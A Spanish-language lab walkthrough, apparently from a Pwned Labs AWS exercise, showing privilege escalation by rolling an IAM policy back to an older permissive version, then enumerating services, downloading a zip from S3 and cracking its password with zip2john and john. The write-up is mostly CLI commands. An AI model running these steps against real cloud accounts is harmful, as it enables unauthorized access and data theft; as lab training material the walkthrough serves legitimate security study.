Escalate Privileges by IAM Policy Rollback

Escalate Privileges by IAM Policy Rollback


Aws PwnedLabs

aws configure

ssh_command.

aws sts get-caller-identity

Verificar que tenemos las credenciales correctas

ssh_command.

aws iam list-user-policies --user-name intern01

ssh_command.

Verificamos polizas adjuntas a la cuenta.

aws iam list-attached-user-policies --user-name intern01

ssh_command.

aws iam get-policy-version --policy-arn arn:aws:iam::582181986581:policy/intern_policy

ssh_command.

Podemos ver las acciones que se pueden ejecutar con esta version #2.

aws iam get-policy-version --policy-arn arn:aws:iam::582181986581:policy/intern_policy --version-id v2

ssh_command.

Se despliega las dos versiones

aws iam list-policy-versions --policy-arn arn:aws:iam::582181986581:policy/intern_policy

ssh_command.

Lo seteamos a la poliza #1.

aws iam set-default-policy-version --policy-arn arn:aws:iam::582181986581:policy/intern_policy --version-id v1

ssh_command.

Creamos un archivo .env

aws-enumerator cred -aws_access_key_id [REDACTED] -aws_secret_access_key [REDACTED] -aws_region us-east-1

ssh_command.

Vemos que tipo de servicios podemos tener acceso.

aws-enumerator enum -services all

ssh_command.

Vemos que tenemos acceso a buckets o s3.

aws-enumerator dump -services s3

ssh_command.

Tiene un archivo zip.

aws s3 ls

aws s3 ls huge-logistics-data-4662493c05c8

ssh_command.

Bajamos el archivo.

aws s3 cp s3://huge-logistics-data-4662493c05c8/amex-export.zip .

unzip amex-export.zip

ssh_command.

Se necesita una contrasena para ver el archivo entonces usamos zip2john

zip2john amex-export.zip > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

ssh_command.

unzip amex-export.zip

bc flag.txt

ssh_command.

© 2026 Cu3rv0x